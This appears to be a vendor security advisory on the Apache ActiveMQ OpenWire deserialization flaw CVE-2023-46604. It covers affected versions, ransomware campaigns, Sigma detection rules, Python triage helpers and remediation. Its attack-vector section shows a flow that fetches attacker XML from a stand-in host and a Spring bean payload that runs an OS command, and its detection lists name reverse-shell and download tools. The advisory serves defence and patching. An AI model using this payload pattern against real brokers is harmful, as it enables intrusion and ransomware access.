By Lyrie Threat Intelligence·4/25/2026

CVE-2023-46604: Apache ActiveMQ OpenWire Deserialization RCE

CVSS 10.0 (CRITICAL) | Apache ActiveMQ < 5.18.3 | Unauthenticated Remote Code Execution via OpenWire Deserialization

Executive Summary

CVE-2023-46604 is a maximum-severity remote code execution vulnerability in Apache ActiveMQ's OpenWire protocol. By exploiting unsafe deserialization of ClassPathXmlApplicationContext objects, unauthenticated attackers can achieve arbitrary code execution on ActiveMQ brokers. The vulnerability has been actively exploited since October 2023, with confirmed ransomware campaigns leveraging it for initial access.

Key Facts:

  • CVSS 10.0: Perfect score (maximum exploitability + impact)
  • Authentication required: None
  • Attack vector: Network (default port 61616 OpenWire)
  • Known ransomware use: HelloKitty, TellYouThePass ransomware families
  • CISA KEV status: Confirmed active exploitation

Vulnerability Mechanics

Apache ActiveMQ is an enterprise message broker used for asynchronous communication between distributed systems. The OpenWire protocol (port 61616) handles binary serialized Java objects. The vulnerability chain:

1. Unauthenticated OpenWire Connection

Attacker connects to ActiveMQ OpenWire port (default 61616) without credentials

2. Malicious ExceptionResponse Message

Sends crafted ExceptionResponse message containing serialized ClassPathXmlApplicationContext object

3. Spring Framework Deserialization

ActiveMQ deserializes the object, triggering Spring Framework's XML parsing

4. Remote XML Loading

ClassPathXmlApplicationContext loads attacker-controlled XML from external URL

5. Arbitrary Code Execution

XML contains Spring bean with constructor-arg invoking OS commands

Root Cause: Unsafe deserialization of user-controlled ClassPathXmlApplicationContext objects without validation[^1].

Attack Surface

Affected Versions

  • Apache ActiveMQ 5.18.0 - 5.18.2
  • Apache ActiveMQ 5.17.0 - 5.17.5
  • Apache ActiveMQ 5.16.x and earlier (all versions)

Patched in: ActiveMQ 5.18.3, 5.17.6
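An inventory triage helper built from the affected and fixed versions listed above (an added example, not from the advisory or the ActiveMQ project): it encodes only the 5.x ranges this page states, and the inventory entries in it are constructed.

```python
"""Triage an ActiveMQ inventory against the affected ranges listed above."""
import re
from typing import Iterable, Optional, Tuple

Version = Tuple[int, int, int]
# First fixed release per branch, as stated on this page; 5.16.x and earlier
# have no fixed release and are affected in full.
FIXED = {18: (5, 18, 3), 17: (5, 17, 6)}

def parse_version(text: str) -> Optional[Version]:
    """Extract a dotted x.y.z version from a banner or package string."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    return (int(m[1]), int(m[2]), int(m[3])) if m else None

def is_vulnerable(v: Version) -> bool:
    """True if v lies inside one of the affected 5.x ranges given above."""
    major, minor, _ = v
    if major != 5:
        return False          # only the 5.x line is covered by this page
    if minor <= 16:
        return True           # 5.16.x and earlier: every release
    fixed = FIXED.get(minor)
    return fixed is not None and v < fixed   # 5.19+ is not listed as affected

def triage(inventory: Iterable[Tuple[str, str]]):
    """(host, banner) pairs -> (host, version, status) with status in
    {'vulnerable', 'not affected', 'unknown'}."""
    rows = []
    for host, banner in inventory:
        v = parse_version(banner)
        if v is None:
            rows.append((host, None, "unknown"))
        else:
            rows.append((host, v, "vulnerable" if is_vulnerable(v) else "not affected"))
    return rows

# Constructed inventory entries, not a real asset list.
INVENTORY = [
    ("mq-01", "Apache ActiveMQ 5.18.2"),
    ("mq-02", "apache-activemq-5.17.6"),
    ("mq-03", "ActiveMQ 5.15.9"),
    ("mq-04", "ActiveMQ 5.18.3"),
    ("mq-05", "banner unavailable"),
]

if __name__ == "__main__":
    for host, v, status in triage(INVENTORY):
        print(host, v, status)
```

Hosts reported as "unknown" still need a manual version check; a missing banner is not evidence of a patched broker.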

Prerequisites

  • ActiveMQ instance with OpenWire protocol enabled (default)
  • Network reachability to port 61616 (often exposed to internal networks, sometimes internet)
  • No authentication required

Attack Vector

# Simplified exploit flow
1. Connect to target:61616 (OpenWire protocol)
2. Send ExceptionResponse with:
   ClassPathXmlApplicationContext("http://attacker.com/exploit.xml")
3. ActiveMQ fetches and parses exploit.xml
4. Spring instantiates bean with OS command execution

Malicious XML (exploit.xml):

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="exploit" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <list>
                <value>calc.exe</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

Post-Exploitation

ActiveMQ typically runs with elevated privileges (often root/SYSTEM). Successful exploitation grants:

  • Arbitrary code execution in ActiveMQ process context
  • Access to message queues (potentially containing sensitive data)
  • Lateral movement capability (ActiveMQ often has broad network access)
  • Persistence (modify ActiveMQ configuration, deploy backdoors)

Real-World Exploitation

Ransomware Campaigns

CVE-2023-46604 has been weaponized by multiple ransomware operators:

HelloKitty Ransomware (October 2023)[^2]

  • Initial access via CVE-2023-46604
  • Deployment of Chisel tunneling tool for lateral movement
  • Exfiltration via Rclone
  • Encryption with HelloKitty ransomware

TellYouThePass Ransomware (November 2023)

  • Rapid exploitation within 24 hours of PoC publication
  • Mass scanning of port 61616 exposed to internet
  • Cryptocurrency miner deployment (pre-ransomware)
  • Final payload: TellYouThePass ransomware

Exploitation Timeline

  • Oct 27, 2023: CVE-2023-46604 disclosed
  • Oct 27, 2023: Public PoC released (same day)
  • Oct 28, 2023: Active exploitation observed (24 hours)
  • Nov 2023: Ransomware campaigns confirmed
  • Dec 2023: Added to CISA KEV

Detection & Response

Network Indicators

TCP connections to port 61616 from unusual sources
OpenWire protocol traffic containing ClassPathXmlApplicationContext
Outbound HTTP/HTTPS requests from ActiveMQ process to external IPs
DNS queries for suspicious domains from ActiveMQ host

Process Indicators

ActiveMQ java process spawning child processes:
- bash, sh, cmd.exe, powershell.exe
- curl, wget (payload download)
- nc, ncat (reverse shells)
- Cryptocurrency miners (xmrig, etc.)
- Ransomware executables

File System Indicators

Unexpected files in ActiveMQ directories:
- Webshells in webapps/admin/ or webapps/api/
- Chisel, Rclone binaries
- Scheduled tasks, cron jobs
- Modified ActiveMQ config files (persistence)

Sigma Rule (Network)

title: CVE-2023-46604 ActiveMQ OpenWire Exploit
logsource:
  category: network_connection   # adjust to the payload-logging sensor (Zeek/Suricata) in use
detection:
  selection:
    destination.port: 61616
    network.protocol: tcp
    # network.bytes is a byte counter in ECS; point this at the sensor's payload field.
    # The class name is written as a UTF string in the marshalled throwable, so it is
    # the reliable token; 'ExceptionResponse' is a command type encoded as a byte on the wire.
    network.bytes|contains:
      - 'ClassPathXmlApplicationContext'
      - 'ExceptionResponse'
  condition: selection
level: critical

Sigma Rule (Process)

title: ActiveMQ Suspicious Child Process
logsource:
  category: process_creation
  product: windows   # '\java.exe' and the '\' separators below are Windows paths
detection:
  selection_parent:
    ParentImage|endswith: '\java.exe'
    ParentCommandLine|contains: 'activemq'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\bash'
      - '\curl.exe'
      - '\wget.exe'
  condition: all of selection_*
level: high
# Linux brokers need a sibling rule (product: linux) matching ParentImage|endswith: '/java'
# and children such as /bin/sh, /bin/bash, /usr/bin/curl, /usr/bin/wget.

Full detection package including YARA rules, Zeek/Suricata signatures available in Lyrie's CVE-2023-46604 exploit lab.
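The process and network indicators above, re-expressed as Python predicates and run over constructed JSON-lines telemetry (an added example, not part of the original write-up or Lyrie's detection package). Process fields use the Sysmon-style names from the Sigma rule; the network event shape (src_ip, dst_port, payload) is an assumption, and the network check is narrower than the Sigma rule: it keys only on the class name string, which OpenWire writes as UTF text in the marshalled throwable.

```python
"""Apply the process and network indicator logic above to sample events."""
import json

# Child images the Process Indicators list flags under an ActiveMQ java parent.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "bash", "sh", "curl",
                       "curl.exe", "wget", "wget.exe", "nc", "ncat", "xmrig"}
# OpenWire marshals a throwable's class name as a UTF string, so the Spring
# context class name is visible in the raw payload of the malicious command.
MARKER = "ClassPathXmlApplicationContext"

def basename(path: str) -> str:
    """Last path component, tolerant of both '\\' and '/' separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def suspicious_child(ev: dict) -> bool:
    """Process event: ActiveMQ's java parent spawning a shell, downloader or miner."""
    parent_java = basename(ev.get("ParentImage", "")) in ("java", "java.exe")
    parent_amq = "activemq" in ev.get("ParentCommandLine", "").lower()
    return parent_java and parent_amq and basename(ev.get("Image", "")) in SUSPICIOUS_CHILDREN

def openwire_marker(ev: dict) -> bool:
    """Network event: traffic to the OpenWire port carrying the class name."""
    return ev.get("dst_port") == 61616 and MARKER in ev.get("payload", "")

def scan(events):
    """Return (kind, detail) for every event matching either indicator."""
    hits = []
    for ev in events:
        if ev.get("type") == "process" and suspicious_child(ev):
            hits.append(("process", ev["Image"]))
        elif ev.get("type") == "network" and openwire_marker(ev):
            hits.append(("network", ev["src_ip"]))
    return hits

def scan_jsonl(lines):
    """Parse JSON-lines telemetry and scan it; blank lines are skipped."""
    return scan(json.loads(line) for line in lines if line.strip())

# Constructed sample telemetry (not real captures); field names are assumed.
SAMPLE_LOG = r"""
{"type":"process","ParentImage":"C:\\Java\\bin\\java.exe","ParentCommandLine":"java -jar activemq.jar start","Image":"C:\\Windows\\System32\\cmd.exe"}
{"type":"process","ParentImage":"/usr/bin/java","ParentCommandLine":"java -cp /opt/activemq/bin/activemq.jar org.apache.activemq.console.Main start","Image":"/usr/bin/curl"}
{"type":"process","ParentImage":"/usr/bin/java","ParentCommandLine":"java -jar jenkins.war","Image":"/bin/sh"}
{"type":"network","src_ip":"203.0.113.7","dst_port":61616,"payload":"org.springframework.context.support.ClassPathXmlApplicationContext"}
{"type":"network","src_ip":"10.0.0.5","dst_port":61616,"payload":"ActiveMQ producer traffic"}
""".splitlines()

if __name__ == "__main__":
    for kind, detail in scan_jsonl(SAMPLE_LOG):
        print(kind, detail)
```

The third sample (a Jenkins java parent spawning sh) is included to show that the parent command line check, not just the java parent, is what keeps the rule scoped to ActiveMQ.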

Remediation

Immediate Actions

1. Upgrade ActiveMQ to 5.18.3, 5.17.6, or later[^3]

2. Network isolation: Restrict port 61616 to trusted internal IPs only (never internet-facing)

3. Hunt for exploitation: Search logs for ClassPathXmlApplicationContext, unexpected child processes, outbound HTTP from ActiveMQ

4. Incident response: If exploitation is confirmed:
- Isolate affected ActiveMQ instances
- Preserve forensic evidence (memory dumps, disk images)
- Scan for ransomware indicators (encrypted files, ransom notes)
- Rebuild from clean backups

Long-Term Mitigation

  • Disable OpenWire on untrusted networks: Use AMQP, STOMP, or MQTT protocols with authentication
  • Network segmentation: ActiveMQ should be in isolated broker zone, not general application network
  • Egress filtering: Block outbound HTTP/HTTPS from ActiveMQ to internet (prevents XML fetching)
  • Least privilege: Run ActiveMQ with dedicated service account, not root/SYSTEM
  • Monitoring: Alert on ActiveMQ child processes, outbound connections, configuration changes

Shodan/Censys Detection

product:"Apache ActiveMQ"
port:61616
org:"Your Organization"

Lyrie Verdict

Threat Level: CRITICAL

CVE-2023-46604 represents the perfect storm of enterprise infrastructure vulnerability:

  • CVSS 10.0 — maximum exploitability and impact
  • Unauthenticated exploitation — no credentials required
  • Trivial weaponization — public PoCs, Metasploit module
  • Confirmed ransomware use — active threat, not theoretical
  • Widespread deployment — ActiveMQ powers enterprise messaging at scale

The Message Broker Blind Spot:

Organizations invest heavily in securing web applications and databases, yet message brokers (ActiveMQ, RabbitMQ, Kafka) operate as security blind spots. These systems:

  • Run with elevated privileges (root/SYSTEM)
  • Have broad network access (connect to databases, APIs, internal services)
  • Contain sensitive data in message queues (credentials, PII, business logic)
  • Receive minimal security scrutiny (no WAF, often exempt from vulnerability scans)

Ransomware Kill Chain via ActiveMQ:

1. Initial access: CVE-2023-46604 exploitation

2. Execution: Deploy Cobalt Strike beacon, reverse shell

3. Persistence: Modify ActiveMQ config, scheduled tasks

4. Privilege escalation: ActiveMQ already runs as root/SYSTEM

5. Defense evasion: Disable EDR, clear logs

6. Credential access: Dump LSASS, access message queue credentials

7. Lateral movement: Pivot to databases, file servers, domain controllers

8. Collection: Exfiltrate sensitive data via Rclone

9. Impact: Deploy ransomware, demand payment

Recommended Posture:

  • Treat message brokers with same security rigor as tier-1 production systems
  • Assume any internet-exposed ActiveMQ < 5.18.3 is compromised
  • Implement zero-trust network architecture for broker infrastructure
  • Monitor for deserialization attacks (ClassPathXmlApplicationContext, ObjectInputStream)
  • Automated patching for critical infrastructure (sub-24-hour response time)

Organizations running ActiveMQ should conduct immediate threat hunts for indicators of CVE-2023-46604 exploitation, regardless of current patch status. The window between disclosure and ransomware deployment was 48 hours.


References

[^1]: Apache Security Advisory: CVE-2023-46604 - ActiveMQ RCE Vulnerability

[^2]: Rapid7 Analysis: ActiveMQ CVE-2023-46604 in HelloKitty Ransomware Campaigns

[^3]: Apache ActiveMQ Release: Version 5.18.3 Security Patch



Last Updated: April 26, 2026

Lyrie Verdict

A vulnerability of this severity is exactly what Lyrie's anti-rogue-AI defense is built for: continuous, autonomous monitoring that doesn't wait for human reaction time.

Validated sources

  1. NIST NVD
  2. MITRE CVE
  3. Lyrie Research Lab